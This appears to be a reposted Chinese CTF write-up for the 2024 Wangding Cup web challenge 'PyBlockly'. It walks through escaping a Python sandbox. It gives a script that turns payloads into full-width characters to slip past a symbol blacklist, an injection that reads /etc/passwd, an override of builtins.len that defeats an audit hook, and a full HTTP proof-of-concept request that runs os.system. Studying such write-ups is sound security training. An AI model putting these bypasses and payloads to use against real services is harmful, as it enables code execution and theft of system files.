当前位置：首页 > news >正文

2024-网鼎杯web-PyBlockly

news 2026/6/15 9:30:43

PyBlockly

分析源代码,逐步确定,asd这里就是关键点所在,

但是这里有check_for_blacklisted_symbols对

[!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~]

这些符号进行过滤

但是asd有经过unidecode.unidecode该函数,所以就可以通过该函数用全角字符绕过黑名单,而后转化为正常的半角字符去执行

半角转全角脚本

def to_fullwidth(text):result = ""for char in text:code = ord(char)if code == 0x20:  # 空格特殊处理code = 0x3000elif 0x21 <= code <= 0x7E:  # ASCII 范围内的可见字符code += 0xFEE0result += chr(code)return result
print(to_fullwidth(""))

执行这段危险代码的地方在

def do(source_code):hook_code = '''
def my_audit_hook(event_name, arg):blacklist = ["popen", "input", "eval", "exec", "compile", "memoryview"]if len(event_name) > 4:raise RuntimeError("Too Long!")for bad in blacklist:if bad in event_name:raise RuntimeError("No!")__import__('sys').addaudithook(my_audit_hook)'''print(source_code)#⬅️在这里code = hook_code + source_codetree = compile(source_code, "run.py", 'exec', flags=ast.PyCF_ONLY_AST)try:if verify_secure(tree):  with open("run.py", 'w') as f:f.write(code)        result = subprocess.run(['python', 'run.py'], stdout=subprocess.PIPE, timeout=5).stdout.decode("utf-8")os.remove('run.py')return resultelse:return "Execution aborted due to security concerns."except:os.remove('run.py')return "Timeout!"

asd换成')去闭合前面的(然后注释掉后面的)

print(asd)

') print(open("/etc/passwd","r").read())# 去脚本转化为全角字符绕过黑名单

＇）　ｐｒｉｎｔ（ｏｐｅｎ（＂／ｅｔｃ／ｐａｓｓｗｄ＂，＂ｒ＂）．ｒｅａｄ（））＃

而后注意前面的闭合之后用;或\n去避免前面的print对后面我们的代码进行影响,不过;好像不好用

而后绕过长度限制,将len函数修改,将返回值固定为3

注意空格

＇）\n＿＿ｂｕｉｌｔｉｎｓ＿＿．ｌｅｎ＝ｌａｍｂｄａｘ：３\nｐｒｉｎｔ（ｌｅｎ（＂ｚｘｃｚｘｃ＂）） \n＃

而后用ssti的payload拼接使用

[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if x.__name__=="_wrap_close"][0]["system"]("ls")

poc

POST http://777.777.777.777:777/blockly_json HTTP/1.1
Host: 777.777.777.777:777
Content-Length: 644
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.9
Accept: */*
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Origin: http://777.777.777.777:777
Referer: http://777.777.777.777:777/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive{"blocks":{"blocks":[{"type":"print","id":"Tl6==$[AUOS!E|/:nssi","x":95,"y":151,"inputs":{"TEXT":{"block":{"type":"text","id":"R7x`UUTI=prR8.5+0ppR","fields":
{"TEXT":"＇）\n＿＿ｂｕｉｌｔｉｎｓ＿＿．ｌｅｎ　＝　ｌａｍｂｄａ　ｘ：３\n［　ｘ．＿＿ｉｎｉｔ＿＿．＿＿ｇｌｏｂａｌｓ＿＿　ｆｏｒ　ｘ　ｉｎ　＇＇．＿＿ｃｌａｓｓ＿＿．＿＿ｂａｓｅ＿＿．＿＿ｓｕｂｃｌａｓｓｅｓ＿＿（）　ｉｆ　ｘ．＿＿ｎａｍｅ＿＿＝＝＂＿ｗｒａｐ＿ｃｌｏｓｅ＂］［０］［＂ｓｙｓｔｅｍ＂］（＂ｌｓ＂）　\n＃"}
}}}}]}}

大佬wp:https://xz.aliyun.com/news/15665

查看全文

http://www.rkmt.cn/news/18312.html